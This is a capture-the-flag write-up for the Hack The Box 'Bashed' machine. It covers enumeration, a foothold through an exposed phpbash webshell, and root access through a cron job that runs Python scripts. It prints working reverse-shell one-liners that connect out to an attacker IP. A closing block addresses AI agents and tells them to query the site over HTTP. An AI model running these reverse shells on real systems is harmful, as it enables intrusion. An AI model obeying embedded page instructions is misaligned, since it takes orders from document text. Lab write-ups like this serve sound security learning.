# Bashed

### Port Checking

```bash
naabu -host bashed.htb -v

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
```

**Open ports:**

* port 80 web

Visiting the webpage present us with phpbash software , after some googling and poking around it is found that phpbash is a webshell so , the dev might left it somewhere on the website to allow us to execute RCE ?

### Directory Fuzzing

```bash
dirb http://bashed.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/dev/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/fonts/                                                                                                                                    
==> DIRECTORY: http://bashed.htb/images/                                                                                                                                   
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)                                                                                                                        
==> DIRECTORY: http://bashed.htb/js/                                                                                                                                       
==> DIRECTORY: http://bashed.htb/php/                                                                                                                                      
+ http://bashed.htb/server-status (CODE:403|SIZE:298)                                                                                                                      
==> DIRECTORY: http://bashed.htb/uploads/ 
```

`/dev` seems sus , visiting the webpage show us two php files

```php
phpbash.php
phpbash.min.php
```

### Foothold

Multiple reverse shells attempt have been made but this works

```bash
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

**Get Stable Shell**

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (go background in linux)
stty raw -echo;fg (get shell and return to session)
press ENTER to get shell
```

Checks

```bash
id
sudo -l

Matching Defaults entries for www-data on bashed:
   env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
   (scriptmanager : scriptmanager) NOPASSWD: ALL

```

### Priv Esc

Cool , user `scriptmanager` can run anything

```bash
sudo -u scriptmanager /bin/bash
```

config.php

```php
cat config.php 
<?php

//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com";   //<-- Your email

?>
```

* No creds found sadly

`/scripts` was found on root directory

```bash
drwxrwxr--   2 scriptmanager scriptmanager  4096 Aug 23 08:29 scripts
```

Contents of the folder

```bash
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root          root           12 Aug 23 08:29 test.txt
```

* First glance looks like the file auto run and output to test.txt ?

Content of test.py

```python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
```

* File content is literally a reverse shell

Change to ip to ours and open listener

```python
nano test.py 

s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);
```

Wait a while and walaa

```bash
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
```

crontab

```bash
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
```

* Crontab confirms that there is root cron that run all `.py` file in `/scripts`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jackmeister.gitbook.io/zctf-writeups/hack-the-box/linux/bashed.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.